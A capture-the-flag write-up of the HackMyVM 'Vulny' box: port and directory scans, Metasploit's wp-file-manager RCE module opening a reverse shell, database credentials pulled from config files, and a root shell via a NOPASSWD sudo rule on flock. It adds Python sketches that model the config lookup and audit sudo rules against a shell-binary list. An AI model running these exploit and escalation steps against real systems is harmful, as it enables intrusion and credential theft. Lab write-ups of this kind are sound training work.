Target machine: https://hackmyvm.eu/machines/machine.php?vm=Vulny
Author: sml
Difficulty: ⭐️⭐️
Topics: wp_file_manager_rce, sudo privilege escalation (flock)
┌──(root㉿kali)-[~]
└─# nmap -sS 192.168.9.14 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 18:57 CST
Nmap scan report for 192.168.9.14
Host is up (0.00033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
33060/tcp open mysqlx
MAC Address: 08:00:27:74:86:89 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
┌──(root㉿kali)-[/home/kali/hmv/Vulny]
└─# gobuster dir -u http://192.168.9.14 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.14
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,jpg,php,html,png
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 10918]
/javascript (Status: 301) [Size: 317] [--> http://192.168.9.14/javascript/]
/secret (Status: 301) [Size: 313] [--> http://192.168.9.14/secret/]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================
Home page
/secret
/javascript
WordPress throws an error saying it cannot find config-168.9.14.php. Even though it errors out, we learn that this directory belongs to WordPress.
Scan the /secret directory.
┌──(root㉿kali)-[/home/kali/hmv/Vulny]
└─# dirsearch -u http://192.168.9.14/secret
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/Vulny/reports/http_192.168.9.14/_secret_24-11-06_19-07-03.txt
Target: http://192.168.9.14/
[19:07:03] Starting: secret/
[19:07:04] 403 - 277B - /secret/.ht_wsr.txt
[19:07:04] 403 - 277B - /secret/.htaccess.bak1
[19:07:04] 403 - 277B - /secret/.htaccess.orig
[19:07:04] 403 - 277B - /secret/.htaccess.sample
[19:07:04] 403 - 277B - /secret/.htaccess_extra
[19:07:04] 403 - 277B - /secret/.htaccess.save
[19:07:04] 403 - 277B - /secret/.htaccess_orig
[19:07:04] 403 - 277B - /secret/.htaccessBAK
[19:07:04] 403 - 277B - /secret/.htaccessOLD
[19:07:04] 403 - 277B - /secret/.htaccess_sc
[19:07:04] 403 - 277B - /secret/.htaccessOLD2
[19:07:04] 403 - 277B - /secret/.html
[19:07:04] 403 - 277B - /secret/.htm
[19:07:04] 403 - 277B - /secret/.htpasswd_test
[19:07:04] 403 - 277B - /secret/.htpasswds
[19:07:04] 403 - 277B - /secret/.httr-oauth
[19:07:04] 403 - 277B - /secret/.php
[19:07:20] 200 - 3KB - /secret/readme.html
[19:07:26] 301 - 322B - /secret/wp-admin -> http://192.168.9.14/secret/wp-admin/
[19:07:26] 301 - 324B - /secret/wp-content -> http://192.168.9.14/secret/wp-content/
[19:07:26] 200 - 511B - /secret/wp-content/
[19:07:26] 500 - 610B - /secret/wp-content/plugins/akismet/admin.php
[19:07:26] 500 - 610B - /secret/wp-content/plugins/akismet/akismet.php
[19:07:26] 200 - 469B - /secret/wp-content/upgrade/
[19:07:26] 200 - 486B - /secret/wp-content/uploads/
[19:07:26] 403 - 277B - /secret/wp-includes/
[19:07:26] 301 - 325B - /secret/wp-includes -> http://192.168.9.14/secret/wp-includes/
[19:07:26] 500 - 0B - /secret/wp-includes/rss-functions.php
[19:07:26] 500 - 3KB - /secret/wp-admin/setup-config.php
/secret/readme.html
/secret/wp-content/
/secret/wp-content/uploads/
This looks like a directory listing exposure.
Found the WordPress plugin package (wp-file-manager).
Its readme.txt gives the version: 6.0.
msfconsole
search wp-file-manager
use exploit/multi/http/wp_file_manager_rce
set targeturi /secret/
set rhost 192.168.9.14
set rport 80
set lhost 192.168.9.3
set lport 1199
set forceexploit true
run
shell
Gathering database information
First, download the whole WordPress install.
Inside the shell:
cd /usr/share/wordpress
tar -czvf wordpress.tar.gz *
exit, then y   // leave the shell
download /usr/share/wordpress/wordpress.tar.gz /home/kali/hmv/Vulny/wordpress.tar.gz
The port scan showed port 33060 open; the corresponding service is mysqlx (the MySQL X protocol).
Look at the config file:
cat /usr/share/wordpress/wp-config.php
<?php
/**
 * WordPress's Debianised default master config file
 * Please do NOT edit and learn how the configuration works in
 * /usr/share/doc/wordpress/README.Debian
 ***/

/* Look up a host-specific config file in
 * /etc/wordpress/config-<host>.php or /etc/wordpress/config-<domain>.php
 */
$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']);
$debian_server = preg_replace("/[^a-zA-Z0-9.\-]/", "", $debian_server);
$debian_file = '/etc/wordpress/config-'.strtolower($debian_server).'.php';

/* Main site in case of multisite with subdomains */
$debian_main_server = preg_replace("/^[^.]*\./", "", $debian_server);
$debian_main_file = '/etc/wordpress/config-'.strtolower($debian_main_server).'.php';

if (file_exists($debian_file)) {
    require_once($debian_file);
    define('DEBIAN_FILE', $debian_file);
} elseif (file_exists($debian_main_file)) {
    require_once($debian_main_file);
    define('DEBIAN_FILE', $debian_main_file);
} elseif (file_exists("/etc/wordpress/config-default.php")) {
    require_once("/etc/wordpress/config-default.php");
    define('DEBIAN_FILE', "/etc/wordpress/config-default.php");
} else {
    header("HTTP/1.0 404 Not Found");
    echo "Neither <b>$debian_file</b> nor <b>$debian_main_file</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.";
    exit(1);
}

/* idrinksomewater */

/* Default value for some constants if they have not yet been set
   by the host-specific config files */
if (!defined('ABSPATH'))
    define('ABSPATH', '/usr/share/wordpress/');
if (!defined('WP_CORE_UPDATE'))
    define('WP_CORE_UPDATE', false);
if (!defined('WP_ALLOW_MULTISITE'))
    define('WP_ALLOW_MULTISITE', true);
if (!defined('DB_NAME'))
    define('DB_NAME', 'wordpress');
if (!defined('DB_USER'))
    define('DB_USER', 'wordpress');
if (!defined('DB_HOST'))
    define('DB_HOST', 'localhost');
if (!defined('WP_CONTENT_DIR') && !defined('DONT_SET_WP_CONTENT_DIR'))
    define('WP_CONTENT_DIR', '/var/lib/wordpress/wp-content');

/* Default value for the table_prefix variable so that it doesn't need to
   be put in every host-specific config file */
if (!isset($table_prefix)) {
    $table_prefix = 'wp_';
}

if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')
    $_SERVER['HTTPS'] = 'on';

require_once(ABSPATH . 'wp-settings.php');
?>
No database password here. Recalling the home page error about a missing file, I guess that the password is in that file.
Sure enough, it's there:
cd /etc/wordpress
ls
config-192.168.1.122.php
htaccess
cat con*
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'myfuckingpassword');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>
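The home page error and the file found under /etc/wordpress are both explained by the host lookup in the Debian wp-config.php shown above: the Host header is sanitised, and config-<host>.php is tried first, then config-<host-minus-first-label>.php, then config-default.php. Below is an added Python model of that lookup (example code, not part of the write-up or of the Debian package); the set of "existing" files is constructed from the `ls /etc/wordpress` output above, and it shows why reaching the box by 192.168.9.14 lands in the branch that prints a 404 naming two paths while 192.168.1.122 resolves to the real file.

```python
from __future__ import annotations

import re

# Added example: a Python model of the host-specific config lookup in
# Debian's /usr/share/wordpress/wp-config.php. It reproduces which
# /etc/wordpress/config-*.php files are tried for a given Host header.

CONFIG_DIR = "/etc/wordpress"

# Files present on the box according to the `ls /etc/wordpress` output
# (constructed stand-in for PHP's file_exists()).
KNOWN_FILES = {f"{CONFIG_DIR}/config-192.168.1.122.php"}


def sanitize_host(http_host: str) -> str:
    """Mirror the two preg_replace() calls: strip ':port', keep only [a-zA-Z0-9.-], lowercase."""
    host = re.sub(r":.*", "", http_host)
    host = re.sub(r"[^a-zA-Z0-9.\-]", "", host)
    return host.lower()


def candidate_files(http_host: str) -> list[str]:
    """Config paths in the order wp-config.php tries them."""
    server = sanitize_host(http_host)
    # "Main site" for multisite: drop the first dotted label. For a bare IP this
    # yields 168.9.14, which is why the error page names config-168.9.14.php.
    main_server = re.sub(r"^[^.]*\.", "", server)
    return [
        f"{CONFIG_DIR}/config-{server}.php",
        f"{CONFIG_DIR}/config-{main_server}.php",
        f"{CONFIG_DIR}/config-default.php",
    ]


def resolve_config(http_host: str, existing: set[str] = KNOWN_FILES) -> str | None:
    """First candidate that exists, or None (the branch that emits the 404 message)."""
    for path in candidate_files(http_host):
        if path in existing:
            return path
    return None


if __name__ == "__main__":
    for host in ("192.168.9.14", "192.168.1.122:80", "www.example.com"):
        print(host, "->", resolve_config(host), candidate_files(host))
```

Two things a defender can take from this: the box only ever had a config for the address it was built with, so any other Host value hits the fallback branch, and that branch echoes both candidate filesystem paths into the response, which is what handed the write-up its hint about where the credentials live.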
Try connecting with Navicat.
Unable to connect.
wp-config.php above contains a very odd comment:
/* idrinksomewater */
It may be a user's password.
Escalate to the adrian user:
su adrian
sudo -l
Matching Defaults entries for adrian on vulny:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User adrian may run the following commands on vulny:
(ALL : ALL) NOPASSWD: /usr/bin/flock
sudo flock -u / /bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
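The whole privilege escalation rests on one sudoers line: a NOPASSWD rule on a binary (flock) whose job is to run whatever command it is given, with no argument restriction. As an added example that is not part of the write-up, the following Python script parses `sudo -l` output and flags exactly those properties; the sample input is constructed from the rule shown above plus one benign rule for contrast, and the deny-list of command-running binaries is a starting point rather than a catalogue.

```python
from __future__ import annotations

import re

# Added example (not from the write-up): audit `sudo -l` output for rules that
# need no password, rules whose arguments are unrestricted, and binaries that
# execute a caller-chosen command (flock runs a program while holding a lock).

# Constructed starting list of binaries that run an arbitrary command for the
# caller; extend it for your own environment.
RUNS_ARBITRARY_COMMAND = {"flock", "sh", "bash", "dash"}

# "(runas) TAG: TAG: command[, command...]" as printed by `sudo -l`
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Sample output constructed from the rule in the write-up plus a benign rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for adrian on vulny:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User adrian may run the following commands on vulny:
    (ALL : ALL) NOPASSWD: /usr/bin/flock
    (root) /usr/bin/systemctl restart apache2
"""


def parse_sudo_l(text: str) -> list[dict]:
    """Return one dict per command rule listed after the 'may run' header."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in re.split(r",\s*", m.group("cmds").strip()):
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": cmd})
    return rules


def audit_rule(rule: dict) -> list[str]:
    """Reasons a rule is risky; an empty list means nothing was flagged."""
    reasons = []
    cmd = rule["cmd"]
    if "NOPASSWD" in rule["tags"]:
        reasons.append("no password required")
    if cmd == "ALL":
        reasons.append("any command allowed")
        return reasons
    parts = cmd.split()
    binary = parts[0].rsplit("/", 1)[-1]
    if binary in RUNS_ARBITRARY_COMMAND:
        reasons.append(f"{binary} executes a caller-chosen command")
    if len(parts) == 1:
        # In sudoers a command listed without arguments matches any arguments.
        reasons.append("arguments unrestricted")
    return reasons


def audit(text: str) -> dict[str, list[str]]:
    """Map each flagged command to the reasons it was flagged."""
    report = {}
    for rule in parse_sudo_l(text):
        reasons = audit_rule(rule)
        if reasons:
            report[rule["cmd"]] = reasons
    return report


if __name__ == "__main__":
    for cmd, reasons in audit(SAMPLE_SUDO_L).items():
        print(f"{cmd}: {', '.join(reasons)}")
```

Run against real output with `sudo -l -U <user>` piped into `audit()`; the fix for a hit like the flock rule is to pin the full argument list in sudoers (or drop the rule) so the binary can no longer be pointed at a shell.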